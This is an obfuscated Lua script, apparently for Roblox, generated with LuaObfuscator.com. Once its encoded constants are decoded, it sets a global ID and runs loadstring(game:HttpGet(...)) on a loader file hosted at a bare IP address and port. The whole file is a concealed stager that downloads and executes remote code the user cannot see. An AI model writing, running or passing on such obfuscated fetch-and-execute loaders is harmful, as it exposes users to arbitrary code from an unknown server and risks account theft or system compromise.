--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v128=v5(v87,v19);v19=nil;return v128;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0 -0 ;local v89;while true do if (v88==(0 -0)) then v89=(v31/(2^(v32-(878 -(282 + 595)))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-((98 + 522) -(499 + 56 + 64)))) + (932 -(857 + 74)))) ;return v89-(v89%1) ;end end else local v90=(570 -(367 + 201))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and ((1322 -394) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -((343 -(32 + 85)) + 1044))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((186 -(67 + 113)) -2) ;return (v41 * (30800116 -14022900)) + (v40 * 65536) + (v39 * (606 -(87 + 263))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,20) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,32)==(2 -1)) and  -((792 -(368 + 423)) -0)) or (3 -2) ;if (v46==(0 + 0)) then if (v45==(997 -(915 + 82))) then return v47 * (0 -0) ;else local v115=0 + 0 ;while true do if (v115==(0 -0)) then v46=1188 -(1069 + 118) ;v44=0 -0 ;break;end end end elseif (v46==(4477 -2430)) then return ((v45==0) and (v47 * ((1 + 0)/((18 -(10 + 8)) -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((7 -5)^(52 + (442 -(416 + 26)))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=1, #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91== #"!") then if (v92== #"!") then v93=(function() return v94()~=0 ;end)();elseif (v92==(1 + 1)) then v93=(function() return v95();end)();elseif (v92== #"asd") then v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==(0 + 0)) then local v121=(function() return 836 -(660 + 176) ;end)();local v122=(function() return;end)();while true do if (v121==0) then v122=(function() return 0;end)();while true do if (v122~=0) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v122=(function() return 1;end)();end if (v122==(1 + 0)) then v91=(function() return  #"!";end)();break;end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==0) then local v123=(function() return 0;end)();while true do if (v123==(203 -(14 + 188))) then v108=(function() return 1;end)();break;end if (v123==(675 -(534 + 141))) then v99=(function() return 0 + 0 ;end)();v100=(function() return nil;end)();v123=(function() return 1 + 0 ;end)();end end end if (v108==(1 + 0)) then local v124=(function() return 0;end)();while true do if (v124==0) then while true do if (v99~=0) then else v100=(function() return v101();end)();if (v102(v100, #"!", #":")==0) then local v130=(function() return 0;end)();local v131=(function() return;end)();local v132=(function() return;end)();local v133=(function() return;end)();local v134=(function() return;end)();while true do if (v130==(1 -0)) then local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (0~=v173) then else v174=(function() return 0;end)();while true do if (v174~=(0 -0)) then else local v204=(function() return 0 + 0 ;end)();while true do if (v204~=1) then else v174=(function() return 1 + 0 ;end)();break;end if ((396 -(115 + 281))~=v204) then else v133=(function() return nil;end)();v134=(function() return nil;end)();v204=(function() return 2 -1 ;end)();end end end if (v174==(1 + 0)) then v130=(function() return 2;end)();break;end end break;end end end if (v130==(4 -2)) then while true do if (v131==2) then local v195=(function() return 0 -0 ;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0;end)();while true do if (v196~=0) then else if (v102(v133, #"!", #"]")== #"[") then v134[869 -(550 + 317) ]=(function() return v103[v134[2 -0 ]];end)();end if (v102(v133,2 -0 ,5 -3 )== #">") then v134[ #"91("]=(function() return v103[v134[ #"xxx"]];end)();end v196=(function() return 1;end)();end if (v196~=1) then else v131=(function() return  #"gha";end)();break;end end break;end end end if (v131== #"!") then local v197=(function() return 285 -(134 + 151) ;end)();local v198=(function() return;end)();while true do if (v197~=(1665 -(970 + 695))) then else v198=(function() return 0 -0 ;end)();while true do if (v198~=(1991 -(582 + 1408))) then else v131=(function() return 2;end)();break;end if (v198~=0) then else v134=(function() return {v104(),v104(),nil,nil};end)();if (v132==(0 -0)) then local v207=(function() return 0;end)();local v208=(function() return;end)();while true do if (v207~=(0 -0)) then else v208=(function() return 1824 -(1195 + 629) ;end)();while true do if (v208~=0) then else v134[ #"xnx"]=(function() return v104();end)();v134[ #"http"]=(function() return v104();end)();break;end end break;end end elseif (v132== #"[") then v134[ #"-19"]=(function() return v105();end)();elseif (v132==(2 -0)) then v134[ #"xnx"]=(function() return v105() -(2^(257 -(187 + 54))) ;end)();elseif (v132~= #"19(") then else local v213=(function() return 780 -(162 + 618) ;end)();local v214=(function() return;end)();while true do if (v213~=0) then else v214=(function() return 0;end)();while true do if (v214~=(0 + 0)) then else v134[ #"91("]=(function() return v105() -((2 + 0)^(33 -17)) ;end)();v134[ #"?id="]=(function() return v104();end)();break;end end break;end end end v198=(function() return 1;end)();end end break;end end end if (v131~= #"91(") then else if (v102(v133, #"xnx", #"asd")~= #"}") then else v134[ #"0836"]=(function() return v103[v134[ #"asd1"]];end)();end v106[v107]=(function() return v134;end)();break;end if (v131~=0) then else local v200=(function() return 0 -0 ;end)();while true do if (v200==(1 + 0)) then v131=(function() return  #"~";end)();break;end if (v200~=(1636 -(1373 + 263))) then else v132=(function() return v102(v100,2, #"asd");end)();v133=(function() return v102(v100, #"0836",6);end)();v200=(function() return 1001 -(451 + 549) ;end)();end end end end break;end if ((0 + 0)==v130) then local v175=(function() return 0;end)();while true do if (v175==0) then v131=(function() return 0;end)();v132=(function() return nil;end)();v175=(function() return 1 -0 ;end)();end if (v175==1) then v130=(function() return 1 -0 ;end)();break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();while true do if (0==v112) then local v125=(function() return 1384 -(746 + 638) ;end)();while true do if (v125==0) then v109[v110-#"," ]=(function() return v111();end)();return v109,v110,v111;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"[",v58 do FlatIdent_2BD95,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_2BD95,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"91("]=(function() return v21();end)();for v70= #",",v23() do FlatIdent_60EA1,Descriptor,v21,v20,v59,v22,v23,v54,v70=(function() return v52(FlatIdent_60EA1,Descriptor,v21,v20,v59,v22,v23,v54,v70);end)();end for v71= #"|",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2 -0 ];local v66=v61[741 -(542 + 196) ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=342 -(218 + 123) ;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -(1 -0) ;local v81={};local v82={};for v113=1581 -(1535 + 46) ,v80 do if ((v113>=v74) or (1869==2009)) then v78[v113-v74 ]=v79[v113 + 1 + 0 + 0 ];else v82[v113]=v79[v113 + 1 + 0 ];end end local v83=(v80-v74) + (561 -(156 + 150 + 254)) ;local v84;local v85;while true do local v114=0 + 0 ;while true do if (v114==(0 -0)) then v84=v72[v76];v85=v84[1468 -(899 + 205 + 363) ];v114=1 + 0 ;end if (v114==(2 -1)) then if (v85<=(613 -(268 + 335))) then if (v85<=(294 -(60 + 230))) then if (v85<=(573 -(426 + 146))) then if ((4412==4412) and (v85==(0 + 0))) then local v135=1456 -(282 + 1174) ;local v136;local v137;local v138;local v139;while true do if ((1750>=842) and (v135==(811 -(569 + 242)))) then v136=v84[5 -3 ];v137,v138=v75(v82[v136](v13(v82,v136 + (2 -1) + 0 ,v84[7 -4 ])));v135=1025 -(706 + 318) ;end if (v135==(1253 -(721 + 530))) then for v186=v136,v77 do local v187=(2822 -(1126 + 425)) -(945 + 326) ;while true do if ((4372>1850) and ((v187==(0 -0)) or (3546<2322))) then v139=v139 + 1 + 0 ;v82[v186]=v137[v139];break;end end end break;end if (v135==(701 -(271 + 429))) then v77=(v138 + v136) -(1 + 0) ;v139=1500 -(1408 + 92) ;v135=1088 -(461 + 625) ;end end else v82[v84[1290 -(993 + 295) ]]();end elseif (v85<=(1 + 1)) then if ((232<821) and (v82[v84[2]]==v84[4])) then v76=v76 + (1172 -(418 + 753)) ;else v76=v84[2 + 1 ];end elseif (v85==(1 + 2)) then local v156=(405 -(118 + 287)) + 0 ;local v157;while true do if ((v156==(0 + 0)) or (2082==4773)) then v157=v84[2];v82[v157]=v82[v157](v13(v82,v157 + (530 -(406 + 123)) ,v77));break;end end else v76=v84[1772 -(1749 + 20) ];end elseif ((518<902) and (3244>1055) and (v85<=7)) then if (v85<=5) then v63[v84[3]]=v82[v84[(3 -2) + 1 ]];elseif ((2994>858) and (v85>(1328 -(1249 + 73)))) then do return;end else v82[v84[2]]=v63[v84[2 + 1 ]];end elseif (v85<=(1153 -(466 + 679))) then if ((v82[v84[4 -(1123 -(118 + 1003)) ]]==v84[11 -7 ]) or (3313<=1778)) then v76=v76 + (1901 -(106 + 1794)) ;else v76=v84[1 + 2 ];end elseif (v85>(3 + 6)) then v82[v84[2]]=v84[(23 -15) -5 ];else v82[v84[5 -(380 -(142 + 235)) ]]=v84[117 -(4 + 110) ];end elseif ((v85<=(599 -(57 + 527))) or (1421>=2104)) then if ((1812<=3249) and (v85<=12)) then if ((v85==((6523 -5085) -(41 + 1386))) or (3755<=915)) then v76=v84[(24 + 82) -(17 + 86) ];else v82[v84[2]]=v63[v84[3 + 0 ]];end elseif (v85<=(28 -15)) then local v145=0;local v146;local v147;while true do if ((1623<=1957) and (v145==(0 -0))) then v146=v84[168 -(122 + 44) ];v147=v82[v84[3]];v145=1;end if (v145==(1 -0)) then v82[v146 + ((980 -(553 + 424)) -2) ]=v147;v82[v146]=v147[v84[4 + 0 ]];break;end end elseif ((3946>3743) and (v85>14)) then for v182=v84[2],v84[3] do v82[v182]=nil;end else v63[v84[1 + 2 ]]=v82[v84[2]];end elseif ((v85<=18) or (1335>=3306)) then if ((4844>2253) and (v85<=(32 -(29 -13)))) then v82[v84[67 -(30 + 35) ]]();elseif (v85==(15 + 2)) then for v184=v84[2 + 0 ],v84[3 + 0 ] do v82[v184]=nil;end else local v168=v84[(734 + 525) -(1043 + 214) ];v82[v168]=v82[v168](v13(v82,v168 + (3 -2) ,v77));end elseif ((452==452) and (v85<=(1231 -(323 + 889)))) then local v148=v84[5 -3 ];local v149,v150=v75(v82[v148](v13(v82,v148 + (581 -(361 + 219)) ,v84[3])));v77=(v150 + v148) -1 ;local v151=0;for v152=v148,v77 do v151=v151 + (321 -(53 + 267)) ;v82[v152]=v149[v151];end elseif (v85==(5 + 15)) then do return;end else local v170=413 -(15 + 398) ;local v171;local v172;while true do if (v170==(982 -(18 + 964))) then v171=v84[7 -5 ];v172=v82[v84[2 + 1 + 0 ]];v170=1 + 0 ;end if ((v170==(851 -(12 + 8 + 830))) or (4557<2087)) then v82[v171 + 1 + 0 ]=v172;v82[v171]=v172[v84[130 -(116 + 10) ]];break;end end end v76=v76 + 1 + (0 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q0003023Q00494403243Q0065393338652Q32392D382Q62662D346166382D383739322D396430666538346462633831030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574032A3Q00682Q74703A2Q2F3130392E37312E3234302E3233353A333931302F63646E2F6C6F616465722E6C75617500153Q0012093Q00014Q0011000100013Q0026083Q00020001000100040B3Q00020001001209000100013Q002608000100050001000100040B3Q00050001001209000200033Q00120E000200023Q00120C000200043Q00120C000300053Q00200D000300030006001209000500074Q0013000300054Q001200023Q00022Q000100020001000100040B3Q0014000100040B3Q0005000100040B3Q0014000100040B3Q000200012Q00073Q00017Q00",v9(),...);
